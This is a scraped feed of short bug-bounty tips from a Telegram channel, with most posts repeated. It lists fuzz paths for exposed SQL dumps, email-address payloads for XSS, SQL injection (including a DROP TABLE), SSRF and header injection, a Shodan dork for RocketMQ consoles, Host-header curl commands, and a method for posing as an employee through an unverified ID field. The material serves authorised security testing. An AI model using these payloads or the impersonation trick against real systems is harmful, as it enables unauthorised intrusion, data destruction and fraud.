#Bug_Bounty_Tips_14
🛡BugBounty_Tips
🔺Here’s a quick tip to find forgotten database dumps using this small but quick fuzz list:
🔰Old database dumps may contain all kinds of interesting information – user credentials, configuration settings, secrets and api keys, customer data and more.
☣️@InfoSecTube
🛡BugBounty_Tips
🔺Here’s a quick tip to find forgotten database dumps using this small but quick fuzz list:
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
setup.sql
sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
🔰Old database dumps may contain all kinds of interesting information – user credentials, configuration settings, secrets and api keys, customer data and more.
☣️@InfoSecTube
#Bug_Bounty_Tips_15
🛡BugBounty_Tips
🌀The following payloads are all valid e-mail addresses that we can use for pentesting of not only web based e-mail systems.
🔺XSS (Cross-Site Scripting):
🔺Template injection:
🔺SQL injection:
🔺SSRF (Server-Side Request Forgery):
🔺Parameter pollution:
🔺(Email) header injection:
☣️@InfoSecTube
🛡BugBounty_Tips
🌀The following payloads are all valid e-mail addresses that we can use for pentesting of not only web based e-mail systems.
🔺XSS (Cross-Site Scripting):
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
🔺Template injection:
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
🔺SQL injection:
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
🔺SSRF (Server-Side Request Forgery):
[email protected]
john.doe@[127.0.0.1]
🔺Parameter pollution:
victim&[email protected]
🔺(Email) header injection:
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>\r\nRCPT TO:<victim+"@test.com
☣️@InfoSecTube
#Bug_Bounty_Tips_16
🛡BugBounty_Tips
🌀Registering as an Employee leads to claim of Employee Only Private Offers and ultimately getting an “Identification Card”.
Methodolgy:
1-Searched for Target‘s employee offers on Google:
3-Found that offers were restricted to employees only.
4-Tried registering with random numbers in the “Employee ID” field
5-Successfully registered as an employee because of no verification of the “Employee ID“.
6-Registering as an employee leads to claim of private offers.
7-The website also provides an “Identification Card” which can be used to show that we are a legitimate employee of the Target.
☣️@InfoSecTube
🛡BugBounty_Tips
🌀Registering as an Employee leads to claim of Employee Only Private Offers and ultimately getting an “Identification Card”.
Methodolgy:
1-Searched for Target‘s employee offers on Google:
inurl:"Target Name" employee offers2-Found website which provides offers to the Target.
3-Found that offers were restricted to employees only.
4-Tried registering with random numbers in the “Employee ID” field
5-Successfully registered as an employee because of no verification of the “Employee ID“.
6-Registering as an employee leads to claim of private offers.
7-The website also provides an “Identification Card” which can be used to show that we are a legitimate employee of the Target.
☣️@InfoSecTube
#Bug_Bounty_Tips_17
🛡BugBounty_Tips
Here’s an example of exposed RocketMQ
RocketMQ is a distributed messaging and streaming platform with low latency, high performance and reliability, trillion-level capacity and flexible scalability.
this time to pull up RocketMQ console which often has quite confidential production information disclosed(Shodan Dorks):
1-Additional hostnames and subdomains
2-Internal IP addresses
3-Log file locations
4-Version details
5-etc
🛡BugBounty_Tips
Here’s an example of exposed RocketMQ
RocketMQ is a distributed messaging and streaming platform with low latency, high performance and reliability, trillion-level capacity and flexible scalability.
this time to pull up RocketMQ console which often has quite confidential production information disclosed(Shodan Dorks):
org:target.com http.title:rocketmq-consoleFrom the exposed RocketMQ consoles we can for example find out:
1-Additional hostnames and subdomains
2-Internal IP addresses
3-Log file locations
4-Version details
5-etc
#Bug_Bounty_Tips_18
🛡BugBounty_Tips
🌀Want to find critical bugs by changing a single header?set the ‘Host’ header to ‘localhost’ in your next directory bruteforce, the results might be surprising! You might gain access to:
1️⃣Special features
2️⃣Internal endpoints
3️⃣Config files, SSL keys
4️⃣Directory listing, …
We can even take this a step further and try to identify all sites that are hosted on the target web server by performing virtual host enumeration. How to enumerate virtual hosts? We could use tools such as these:
ffuf
https-vhosts
virtual-host-discovery
Note that we could also use curl or wget:
☣️@InfoSecTube
🛡BugBounty_Tips
🌀Want to find critical bugs by changing a single header?set the ‘Host’ header to ‘localhost’ in your next directory bruteforce, the results might be surprising! You might gain access to:
1️⃣Special features
2️⃣Internal endpoints
3️⃣Config files, SSL keys
4️⃣Directory listing, …
We can even take this a step further and try to identify all sites that are hosted on the target web server by performing virtual host enumeration. How to enumerate virtual hosts? We could use tools such as these:
ffuf
https-vhosts
virtual-host-discovery
Note that we could also use curl or wget:
curl -v -H "Host: localhost" https://target/
wget -d --header="Host: localhost" https://target/
☣️@InfoSecTube
👍1
#Bug_Bounty_Tips_19
🛡BugBounty_Tips
🌀Javascript polyglot for XSS
🛡BugBounty_Tips
🌀Javascript polyglot for XSS
Note that we may only need a certain portion of the polyglot, depending on our situation. Do not copy & paste blindly.
☣️
@InfoSecTube